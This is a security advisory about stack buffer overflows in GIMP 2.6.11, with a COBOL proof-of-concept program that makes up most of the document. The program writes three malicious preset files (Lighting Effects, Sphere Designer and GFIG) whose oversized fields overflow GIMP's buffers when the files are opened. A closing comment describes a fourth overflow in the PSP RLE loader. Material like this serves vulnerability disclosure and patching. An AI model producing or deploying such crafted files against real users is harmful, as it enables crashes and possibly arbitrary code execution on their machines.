source: http://www.securityfocus.com/bid/45647/info

GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.

Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

GIMP 2.6.11 is vulnerable; other versions may also be affected. 

000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID.              GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR.                  NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION.   43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090     SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100         ORGANIZATION IS LINE SEQUENTIAL.
000110     SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120         ORGANIZATION IS LINE SEQUENTIAL.
000130     SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140         ORGANIZATION IS LINE SEQUENTIAL.
000150*    FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE   PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE   PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE   PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1   PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2   PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3   PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4   PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5   PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6   PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7   PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8   PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1   PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2   PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3   PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1   PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2   PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3   PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4   PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5   PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6   PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7   PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8   PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9   PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA   PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB   PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC   PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD   PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE   PIC X(29) VALUE 'BrushName:      Circle (11)'.
000520 01 TEXV-OUTF   PIC X(29) VALUE 'PaintType:       1'.
000530 01 TEXV-OUTG   PIC X(29) VALUE 'FillType:       0'.
000540 01 TEXV-OUTH   PIC X(29) VALUE 'FillOpacity:    100'.
000550 01 TEXV-OUTI   PIC X(29) VALUE 'Pattern:        Pine'.
000560 01 TEXV-OUTJ   PIC X(29) VALUE 'Gradient:      FG to BG (RGB)'.
000570 01 TEXV-OUTK   PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL   PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM   PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN   PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640*   1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650        OPEN OUTPUT FILE01.
000660        WRITE PRINTLINE FROM TEXT-OUT1.
000670        WRITE PRINTLINE FROM TEXT-OUT2.
000680        WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720        WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730        WRITE PRINTLINE FROM TEXT-OUT5.
000740        WRITE PRINTLINE FROM TEXT-OUT6.
000750        WRITE PRINTLINE FROM TEXT-OUT7.
000760        WRITE PRINTLINE FROM TEXT-OUT8.
000770        CLOSE FILE01.
000780
000790*   2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800        OPEN OUTPUT FILE02.
000810        WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120        WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130        WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140        WRITE QRINTLINE FROM TEXU-OUT3.
001150        CLOSE FILE02.
001160
001170*   3. FILTERS > RENDER > GFIG > FILE > OPEN
001180        OPEN OUTPUT FILE03.
001190        WRITE RRINTLINE FROM TEXV-OUT1.
001200        WRITE RRINTLINE FROM TEXV-OUT2.
001210        WRITE RRINTLINE FROM TEXV-OUT3.
001220        WRITE RRINTLINE FROM TEXV-OUT4.
001230        WRITE RRINTLINE FROM TEXV-OUT5.
001240        WRITE RRINTLINE FROM TEXV-OUT6.
001250        WRITE RRINTLINE FROM TEXV-OUT7.
001260        WRITE RRINTLINE FROM TEXV-OUT8.
001270        WRITE RRINTLINE FROM TEXV-OUT9.
001280        WRITE RRINTLINE FROM TEXV-OUTA.
001290        WRITE RRINTLINE FROM TEXV-OUTB.
001300        WRITE RRINTLINE FROM TEXV-OUTC.
001310        WRITE RRINTLINE FROM TEXV-OUTD.
001320        WRITE RRINTLINE FROM TEXV-OUTE.
001330        WRITE RRINTLINE FROM TEXV-OUTF.
001340        WRITE RRINTLINE FROM TEXV-OUTG.
001350        WRITE RRINTLINE FROM TEXV-OUTH.
001360        WRITE RRINTLINE FROM TEXV-OUTI.
001370        WRITE RRINTLINE FROM TEXV-OUTJ.
001380        WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410        WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420        WRITE RRINTLINE FROM TEXV-OUTL.
001430        WRITE RRINTLINE FROM TEXV-OUTM.
001440        WRITE RRINTLINE FROM TEXV-OUTN.
001450        CLOSE FILE03.
001460
001470*   4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480*      OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490*      STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500*      ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520*      HAPPY NEW YEAR!!!               http://rock-madrid.com/
001530
001540        STOP RUN.
